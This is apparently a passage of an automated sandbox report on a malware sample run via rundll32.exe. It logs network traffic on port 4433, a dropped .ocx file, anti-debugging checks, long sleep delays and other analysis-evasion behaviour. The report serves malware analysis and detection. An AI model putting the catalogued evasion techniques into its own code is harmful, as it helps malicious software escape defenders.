Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49821

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\rundll32.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Source: C:\Windows\SysWOW64\rundll32.exe

Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: GetAdaptersInfo,

13_2_7EDE8C30

Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: foregroundWindowGot 874			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: foregroundWindowGot 874			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Window / User API: foregroundWindowGot 875

Source: C:\Windows\SysWOW64\rundll32.exe

Dropped PE file which has not been started: C:\Users\user\8f08\user-PC\user-PC.ocx

Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 0.8 %
Source: C:\Windows\SysWOW64\regsvr32.exe	API coverage: 0.0 %

Source: C:\Windows\SysWOW64\rundll32.exe TID: 7288	Thread sleep count: 96 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7288	Thread sleep time: -12480000s >= -30000s			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 13_2_7EDE8780 GetSystemInfo,

13_2_7EDE8780

Source: C:\Windows\System32\loaddll32.exe	Thread delayed: delay time: 120000			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 130000			Jump to behavior

Source: rundll32.exe, 0000000D.00000003.1392652563.000000000570D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ZTOJcUlTUW1aOTU+/PvgsSHSh7gMPqYBL4au5h9qMu51NPvmcix0zDwiiXJJcFFt
Source: rundll32.exe, 0000000D.00000003.1392652563.000000000570D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cfuNua4s2oHZikvmCIgeaGRZPRANIrEH7Qx3faVzu/U8KOC2n1zUotY6XrkUbdKV
Source: rundll32.exe, 0000000D.00000002.2505715458.00000000031C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 0000000D.00000002.2505715458.00000000031C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW4E

Source: C:\Windows\SysWOW64\rundll32.exe

API call chain: ExitProcess graph end node

Anti Debugging

Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 13_2_7EE03887 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

13_2_7EE03887

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_6CF4D480 mov eax, dword ptr fs:[00000030h]		13_2_6CF4D480
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDB9F44 mov edx, dword ptr fs:[00000030h]		13_2_7EDB9F44
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDE8C30 mov ecx, dword ptr fs:[00000030h]		13_2_7EDE8C30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDE8C30 mov eax, dword ptr fs:[00000030h]		13_2_7EDE8C30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDE8C30 mov edx, dword ptr fs:[00000030h]		13_2_7EDE8C30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDE8C30 mov eax, dword ptr fs:[00000030h]		13_2_7EDE8C30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDE8C30 mov ecx, dword ptr fs:[00000030h]		13_2_7EDE8C30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDF1D60 mov ecx, dword ptr fs:[00000030h]		13_2_7EDF1D60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDF1D60 mov edx, dword ptr fs:[00000030h]		13_2_7EDF1D60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDF1D60 mov eax, dword ptr fs:[00000030h]		13_2_7EDF1D60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDF1D60 mov ecx, dword ptr fs:[00000030h]		13_2_7EDF1D60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDF1D60 mov ecx, dword ptr fs:[00000030h]		13_2_7EDF1D60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDF1D60 mov ecx, dword ptr fs:[00000030h]		13_2_7EDF1D60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDF1D60 mov eax, dword ptr fs:[00000030h]		13_2_7EDF1D60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDF1D60 mov ecx, dword ptr fs:[00000030h]		13_2_7EDF1D60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDF1D60 mov edx, dword ptr fs:[00000030h]		13_2_7EDF1D60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDF1D60 mov eax, dword ptr fs:[00000030h]		13_2_7EDF1D60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDF1D60 mov eax, dword ptr fs:[00000030h]		13_2_7EDF1D60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDF1D60 mov edx, dword ptr fs:[00000030h]		13_2_7EDF1D60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDF1D60 mov ecx, dword ptr fs:[00000030h]		13_2_7EDF1D60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDF1D60 mov ecx, dword ptr fs:[00000030h]		13_2_7EDF1D60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDF1D60 mov eax, dword ptr fs:[00000030h]		13_2_7EDF1D60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDF1D60 mov edx, dword ptr fs:[00000030h]		13_2_7EDF1D60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDEBB90 mov edx, dword ptr fs:[00000030h]		13_2_7EDEBB90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDC86E2 mov eax, dword ptr fs:[00000030h]		13_2_7EDC86E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDE8780 mov edx, dword ptr fs:[00000030h]		13_2_7EDE8780
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDDC4F0 mov ecx, dword ptr fs:[00000030h]		13_2_7EDDC4F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDEE5D0 mov ecx, dword ptr fs:[00000030h]		13_2_7EDEE5D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDEC060 mov ecx, dword ptr fs:[00000030h]		13_2_7EDEC060
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDFE179 mov ecx, dword ptr fs:[00000030h]		13_2_7EDFE179
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDB4EF1 mov edx, dword ptr fs:[00000030h]		13_2_7EDB4EF1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDF5EAD mov ecx, dword ptr fs:[00000030h]		13_2_7EDF5EAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDFEE57 mov ecx, dword ptr fs:[00000030h]		13_2_7EDFEE57
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EE19E7B mov eax, dword ptr fs:[00000030h]		13_2_7EE19E7B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EE19E06 mov eax, dword ptr fs:[00000030h]		13_2_7EE19E06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDBAE34 mov edx, dword ptr fs:[00000030h]		13_2_7EDBAE34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDF5E22 mov ecx, dword ptr fs:[00000030h]		13_2_7EDF5E22
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDB3FF4 mov edx, dword ptr fs:[00000030h]		13_2_7EDB3FF4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDB3FF4 mov ecx, dword ptr fs:[00000030h]		13_2_7EDB3FF4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDB6FE0 mov edx, dword ptr fs:[00000030h]		13_2_7EDB6FE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDB3F90 mov edx, dword ptr fs:[00000030h]		13_2_7EDB3F90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDB3F90 mov ecx, dword ptr fs:[00000030h]		13_2_7EDB3F90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDB3F90 mov ecx, dword ptr fs:[00000030h]		13_2_7EDB3F90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDB3F90 mov ecx, dword ptr fs:[00000030h]		13_2_7EDB3F90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDB3F90 mov ecx, dword ptr fs:[00000030h]		13_2_7EDB3F90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDB3F90 mov edx, dword ptr fs:[00000030h]		13_2_7EDB3F90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDFEF8D mov ecx, dword ptr fs:[00000030h]		13_2_7EDFEF8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDB9FB1 mov edx, dword ptr fs:[00000030h]		13_2_7EDB9FB1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDC5F40 mov edx, dword ptr fs:[00000030h]		13_2_7EDC5F40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDC5F40 mov eax, dword ptr fs:[00000030h]		13_2_7EDC5F40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDBEF70 mov eax, dword ptr fs:[00000030h]		13_2_7EDBEF70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDE7F30 mov ecx, dword ptr fs:[00000030h]		13_2_7EDE7F30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDE7F30 mov eax, dword ptr fs:[00000030h]		13_2_7EDE7F30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDE7F30 mov ecx, dword ptr fs:[00000030h]		13_2_7EDE7F30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDB6C2A mov eax, dword ptr fs:[00000030h]		13_2_7EDB6C2A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDD1C20 mov eax, dword ptr fs:[00000030h]		13_2_7EDD1C20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDD1C20 mov eax, dword ptr fs:[00000030h]		13_2_7EDD1C20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDD1C20 mov edx, dword ptr fs:[00000030h]		13_2_7EDD1C20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDD1C20 mov eax, dword ptr fs:[00000030h]		13_2_7EDD1C20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDEADB0 mov ecx, dword ptr fs:[00000030h]		13_2_7EDEADB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDEADB0 mov eax, dword ptr fs:[00000030h]		13_2_7EDEADB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDEADB0 mov ecx, dword ptr fs:[00000030h]		13_2_7EDEADB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDEADB0 mov edx, dword ptr fs:[00000030h]		13_2_7EDEADB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDEADB0 mov eax, dword ptr fs:[00000030h]		13_2_7EDEADB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDDAD50 mov ecx, dword ptr fs:[00000030h]		13_2_7EDDAD50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDD1D44 mov eax, dword ptr fs:[00000030h]		13_2_7EDD1D44
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDD1D44 mov eax, dword ptr fs:[00000030h]		13_2_7EDD1D44
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDEBD70 mov eax, dword ptr fs:[00000030h]		13_2_7EDEBD70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDBAD3D mov edx, dword ptr fs:[00000030h]		13_2_7EDBAD3D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDBAADF mov edx, dword ptr fs:[00000030h]		13_2_7EDBAADF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDCAAE0 mov ecx, dword ptr fs:[00000030h]		13_2_7EDCAAE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EE01A50 mov eax, dword ptr fs:[00000030h]		13_2_7EE01A50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDD7A11 mov eax, dword ptr fs:[00000030h]		13_2_7EDD7A11
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDD7A11 mov eax, dword ptr fs:[00000030h]		13_2_7EDD7A11
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDB6B90 mov eax, dword ptr fs:[00000030h]		13_2_7EDB6B90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDEBB80 mov eax, dword ptr fs:[00000030h]		13_2_7EDEBB80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDFEB49 mov ecx, dword ptr fs:[00000030h]		13_2_7EDFEB49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDE9B40 mov eax, dword ptr fs:[00000030h]		13_2_7EDE9B40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDD38EC mov eax, dword ptr fs:[00000030h]		13_2_7EDD38EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDD78EC mov eax, dword ptr fs:[00000030h]		13_2_7EDD78EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDD78EC mov eax, dword ptr fs:[00000030h]		13_2_7EDD78EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDD78EC mov ecx, dword ptr fs:[00000030h]		13_2_7EDD78EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDD78EC mov edx, dword ptr fs:[00000030h]		13_2_7EDD78EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDD78EC mov eax, dword ptr fs:[00000030h]		13_2_7EDD78EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDF698D mov ecx, dword ptr fs:[00000030h]		13_2_7EDF698D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDB6980 mov edx, dword ptr fs:[00000030h]		13_2_7EDB6980
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDF6902 mov ecx, dword ptr fs:[00000030h]		13_2_7EDF6902
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDE8930 mov eax, dword ptr fs:[00000030h]		13_2_7EDE8930
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDD56B2 mov eax, dword ptr fs:[00000030h]		13_2_7EDD56B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDD56B2 mov eax, dword ptr fs:[00000030h]		13_2_7EDD56B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDD56B2 mov eax, dword ptr fs:[00000030h]		13_2_7EDD56B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDBA6A2 mov edx, dword ptr fs:[00000030h]		13_2_7EDBA6A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDFE7CE mov ecx, dword ptr fs:[00000030h]		13_2_7EDFE7CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDC87E6 mov eax, dword ptr fs:[00000030h]		13_2_7EDC87E6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDD0745 mov eax, dword ptr fs:[00000030h]		13_2_7EDD0745
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDD0745 mov eax, dword ptr fs:[00000030h]		13_2_7EDD0745
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDBA72C mov edx, dword ptr fs:[00000030h]		13_2_7EDBA72C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDB44E4 mov ecx, dword ptr fs:[00000030h]		13_2_7EDB44E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDB44E4 mov ecx, dword ptr fs:[00000030h]		13_2_7EDB44E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDB44E4 mov edx, dword ptr fs:[00000030h]		13_2_7EDB44E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDB8440 mov edx, dword ptr fs:[00000030h]		13_2_7EDB8440
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDB8440 mov ecx, dword ptr fs:[00000030h]		13_2_7EDB8440
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDB8440 mov ecx, dword ptr fs:[00000030h]		13_2_7EDB8440
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDE7460 mov eax, dword ptr fs:[00000030h]		13_2_7EDE7460
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDBE41E mov edx, dword ptr fs:[00000030h]		13_2_7EDBE41E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDBE41E mov eax, dword ptr fs:[00000030h]		13_2_7EDBE41E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDBA415 mov edx, dword ptr fs:[00000030h]		13_2_7EDBA415
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDD558D mov eax, dword ptr fs:[00000030h]		13_2_7EDD558D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDD558D mov eax, dword ptr fs:[00000030h]		13_2_7EDD558D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDD558D mov eax, dword ptr fs:[00000030h]		13_2_7EDD558D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDD558D mov ecx, dword ptr fs:[00000030h]		13_2_7EDD558D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDD558D mov edx, dword ptr fs:[00000030h]		13_2_7EDD558D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDD558D mov ecx, dword ptr fs:[00000030h]		13_2_7EDD558D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDD558D mov eax, dword ptr fs:[00000030h]		13_2_7EDD558D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDD558D mov ecx, dword ptr fs:[00000030h]		13_2_7EDD558D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDB5542 mov ecx, dword ptr fs:[00000030h]		13_2_7EDB5542
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDB5542 mov eax, dword ptr fs:[00000030h]		13_2_7EDB5542
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDC6540 mov eax, dword ptr fs:[00000030h]		13_2_7EDC6540
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDBA2E1 mov edx, dword ptr fs:[00000030h]		13_2_7EDBA2E1
